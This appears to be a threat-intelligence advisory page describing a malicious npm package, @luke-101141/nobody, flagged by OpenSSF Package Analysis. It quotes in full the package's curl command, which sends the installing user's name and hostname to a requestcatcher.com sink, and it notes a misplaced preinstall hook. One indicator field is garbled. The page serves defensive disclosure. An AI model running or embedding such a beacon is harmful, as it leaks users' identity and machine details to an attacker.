Supply-chain threat intelligence

Incident detail

criticalnpm·malware·osv

Malicious code in @luke-101141/nobody (npm)

@luke-101141/nobody

Risk score

92

AI summary

Indexed incident for @luke-101141/nobody (npm).

Description

On require(), index.js executes curl -X POST "http://frgthyujiouyh.requestcatcher.com/noderedactedsdk/$(whoami)/$(hostname)/", leaking the installing user's identity and machine hostname over plaintext HTTP to an anonymous request-inspection service (requestcatcher.com) commonly used as a throwaway exfil sink. The package has no advertised functionality — empty description, no useful exports — its sole effect is the identity beacon. package.json also contains a top-level "preinstall": "node index.js" field outside the scripts block; as written it does not fire at install time, but the intent to trigger the same payload at npm install is explicit. Any consumer importing this package leaks host/user identity to the attacker.

The OpenSSF Package Analysis project identified '@luke-101141/nobody' @ 1.0.1 (npm) as malicious.

It is considered malicious because:

  • The package executes one or more commands associated with malicious behavior.

Technical details

Indicators

  • affected version<function fixed() { [native code] }75%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents